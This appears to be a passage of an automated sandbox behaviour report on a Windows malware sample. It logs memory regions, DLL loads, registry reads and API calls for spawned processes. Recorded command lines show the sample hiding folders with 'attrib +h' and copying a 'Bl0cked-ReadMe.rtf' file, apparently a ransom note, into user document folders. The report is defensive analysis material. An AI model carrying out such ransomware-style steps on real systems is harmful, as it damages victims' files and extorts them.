"\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10625 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 10626 start_va = 0x550000 end_va = 0x55ffff entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 10627 start_va = 0x6e2b0000 end_va = 0x6e2ccfff entry_point = 0x6e2b0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 10628 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 10629 start_va = 0x75680000 end_va = 0x75720fff 
entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 10630 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 10631 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10632 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 10633 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 10634 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 10635 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 10636 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 10637 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 
10638 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 10639 start_va = 0x120000 end_va = 0x1e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 10640 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 10641 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 141 os_tid = 0x328 Process: id = "85" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16880" os_pid = "0x7ac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "82" os_parent_pid = "0x87c" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10642 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10643 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10644 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10645 start_va = 0xd0000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 10646 start_va = 0x2e0000 end_va = 0x2e6fff entry_point = 0x2e0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 10647 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10648 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10649 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 10650 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 10651 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 10652 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 10653 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 10654 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10655 start_va = 0x200000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = 
"private_0x0000000000200000" filename = "" Region: id = 10656 start_va = 0x4a0000 end_va = 0x59ffff entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 10657 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 10658 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 10659 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 10660 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 10661 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10662 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 10663 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 10664 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: 
"c:\\windows\\system32\\user32.dll") Region: id = 10665 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 10666 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 10667 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 10668 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 10669 start_va = 0x110000 end_va = 0x1d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 10670 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 10671 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 142 os_tid = 0x488 Process: id = "86" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea166a0" os_pid = "0x928" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Bl0cked-ReadMe.rtf\"" cur_dir = 
"C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10694 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10695 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10696 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10697 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 10698 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 10699 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10700 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10701 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 10702 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name 
= "private_0x000000007ffde000" filename = "" Region: id = 10703 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 10909 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 10910 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 10911 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 10912 start_va = 0x2b0000 end_va = 0x316fff entry_point = 0x2b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10913 start_va = 0x420000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 10914 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 10915 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 10916 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 10917 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10918 start_va = 0x76a90000 end_va = 
0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 10919 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 10920 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 10921 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 10922 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 10923 start_va = 0x320000 end_va = 0x3e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000320000" filename = "" Region: id = 10924 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 10925 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 10926 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 10927 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 10928 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 
region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 10929 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 10930 start_va = 0x430000 end_va = 0x530fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 10931 start_va = 0x540000 end_va = 0x113ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 10932 start_va = 0x1140000 end_va = 0x12a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001140000" filename = "" Thread: id = 144 os_tid = 0x924 [0128.870] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2afe84 | out: lpSystemTimeAsFileTime=0x2afe84*(dwLowDateTime=0x86bf7520, dwHighDateTime=0x1d440a9)) [0128.870] GetCurrentProcessId () returned 0x928 [0128.870] GetCurrentThreadId () returned 0x924 [0128.870] GetTickCount () returned 0x29452 [0128.870] QueryPerformanceCounter (in: lpPerformanceCount=0x2afe7c | out: lpPerformanceCount=0x2afe7c*=18565919177) returned 1 [0128.870] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0128.871] __set_app_type (_Type=0x1) [0128.871] __p__fmode () returned 0x76b331f4 [0128.871] __p__commode () returned 0x76b331fc [0128.871] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0128.871] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0128.871] GetCurrentThreadId () returned 0x924 [0128.871] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x924) returned 0x38 [0128.871] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0128.871] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0128.871] SetThreadUILanguage 
(LangId=0x0) returned 0x409 [0128.871] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0128.871] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2afe14 | out: phkResult=0x2afe14*=0x0) returned 0x2 [0128.872] VirtualQuery (in: lpAddress=0x2afe4b, lpBuffer=0x2afde4, dwLength=0x1c | out: lpBuffer=0x2afde4*(BaseAddress=0x2af000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0128.872] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x2afde4, dwLength=0x1c | out: lpBuffer=0x2afde4*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0128.872] VirtualQuery (in: lpAddress=0x1b1000, lpBuffer=0x2afde4, dwLength=0x1c | out: lpBuffer=0x2afde4*(BaseAddress=0x1b1000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0128.872] VirtualQuery (in: lpAddress=0x1b3000, lpBuffer=0x2afde4, dwLength=0x1c | out: lpBuffer=0x2afde4*(BaseAddress=0x1b3000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0128.872] VirtualQuery (in: lpAddress=0x2b0000, lpBuffer=0x2afde4, dwLength=0x1c | out: lpBuffer=0x2afde4*(BaseAddress=0x2b0000, AllocationBase=0x2b0000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0128.872] GetConsoleOutputCP () returned 0x1b5 [0128.872] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0128.872] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0128.872] _get_osfhandle (_FileHandle=1) returned 0x7 [0128.872] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0128.874] 
_get_osfhandle (_FileHandle=1) returned 0x7 [0128.874] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0128.876] _get_osfhandle (_FileHandle=1) returned 0x7 [0128.876] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0128.877] _get_osfhandle (_FileHandle=0) returned 0x3 [0128.877] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0128.881] _get_osfhandle (_FileHandle=0) returned 0x3 [0128.881] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0128.881] GetEnvironmentStringsW () returned 0xa01b8* [0128.882] FreeEnvironmentStringsW (penv=0xa01b8) returned 1 [0128.882] GetEnvironmentStringsW () returned 0xa01b8* [0128.882] FreeEnvironmentStringsW (penv=0xa01b8) returned 1 [0128.882] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2aed84 | out: phkResult=0x2aed84*=0x40) returned 0x0 [0128.882] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2aed8c, lpData=0x2aed90, lpcbData=0x2aed88*=0x1000 | out: lpType=0x2aed8c*=0x0, lpData=0x2aed90*=0xf0, lpcbData=0x2aed88*=0x1000) returned 0x2 [0128.882] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2aed8c, lpData=0x2aed90, lpcbData=0x2aed88*=0x1000 | out: lpType=0x2aed8c*=0x4, lpData=0x2aed90*=0x1, lpcbData=0x2aed88*=0x4) returned 0x0 [0128.882] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2aed8c, lpData=0x2aed90, lpcbData=0x2aed88*=0x1000 | out: lpType=0x2aed8c*=0x0, lpData=0x2aed90*=0x1, lpcbData=0x2aed88*=0x1000) returned 0x2 [0128.882] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2aed8c, lpData=0x2aed90, lpcbData=0x2aed88*=0x1000 | out: lpType=0x2aed8c*=0x4, lpData=0x2aed90*=0x0, lpcbData=0x2aed88*=0x4) returned 0x0 [0128.882] RegQueryValueExW (in: 
hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2aed8c, lpData=0x2aed90, lpcbData=0x2aed88*=0x1000 | out: lpType=0x2aed8c*=0x4, lpData=0x2aed90*=0x40, lpcbData=0x2aed88*=0x4) returned 0x0 [0128.882] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2aed8c, lpData=0x2aed90, lpcbData=0x2aed88*=0x1000 | out: lpType=0x2aed8c*=0x4, lpData=0x2aed90*=0x40, lpcbData=0x2aed88*=0x4) returned 0x0 [0128.882] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2aed8c, lpData=0x2aed90, lpcbData=0x2aed88*=0x1000 | out: lpType=0x2aed8c*=0x0, lpData=0x2aed90*=0x40, lpcbData=0x2aed88*=0x1000) returned 0x2 [0128.882] RegCloseKey (hKey=0x40) returned 0x0 [0128.882] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2aed84 | out: phkResult=0x2aed84*=0x40) returned 0x0 [0128.882] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2aed8c, lpData=0x2aed90, lpcbData=0x2aed88*=0x1000 | out: lpType=0x2aed8c*=0x0, lpData=0x2aed90*=0x40, lpcbData=0x2aed88*=0x1000) returned 0x2 [0128.882] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2aed8c, lpData=0x2aed90, lpcbData=0x2aed88*=0x1000 | out: lpType=0x2aed8c*=0x4, lpData=0x2aed90*=0x1, lpcbData=0x2aed88*=0x4) returned 0x0 [0128.882] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2aed8c, lpData=0x2aed90, lpcbData=0x2aed88*=0x1000 | out: lpType=0x2aed8c*=0x0, lpData=0x2aed90*=0x1, lpcbData=0x2aed88*=0x1000) returned 0x2 [0128.882] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2aed8c, lpData=0x2aed90, lpcbData=0x2aed88*=0x1000 | out: lpType=0x2aed8c*=0x4, lpData=0x2aed90*=0x0, lpcbData=0x2aed88*=0x4) returned 0x0 [0128.882] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, 
lpType=0x2aed8c, lpData=0x2aed90, lpcbData=0x2aed88*=0x1000 | out: lpType=0x2aed8c*=0x4, lpData=0x2aed90*=0x9, lpcbData=0x2aed88*=0x4) returned 0x0 [0128.882] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2aed8c, lpData=0x2aed90, lpcbData=0x2aed88*=0x1000 | out: lpType=0x2aed8c*=0x4, lpData=0x2aed90*=0x9, lpcbData=0x2aed88*=0x4) returned 0x0 [0128.882] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2aed8c, lpData=0x2aed90, lpcbData=0x2aed88*=0x1000 | out: lpType=0x2aed8c*=0x0, lpData=0x2aed90*=0x9, lpcbData=0x2aed88*=0x1000) returned 0x2 [0128.882] RegCloseKey (hKey=0x40) returned 0x0 [0128.883] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886363 [0128.883] srand (_Seed=0x5b886363) [0128.883] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Bl0cked-ReadMe.rtf\"" [0128.883] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Bl0cked-ReadMe.rtf\"" [0128.883] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0128.883] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xa1918, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0128.883] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0128.883] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0128.883] GetEnvironmentVariableW 
(in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0128.883] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0128.883] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0128.883] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0128.883] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0128.883] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0128.883] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0128.883] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0128.883] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0128.883] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0128.884] GetEnvironmentStringsW () returned 0xa2308* [0128.884] FreeEnvironmentStringsW (penv=0xa2308) returned 1 [0128.884] 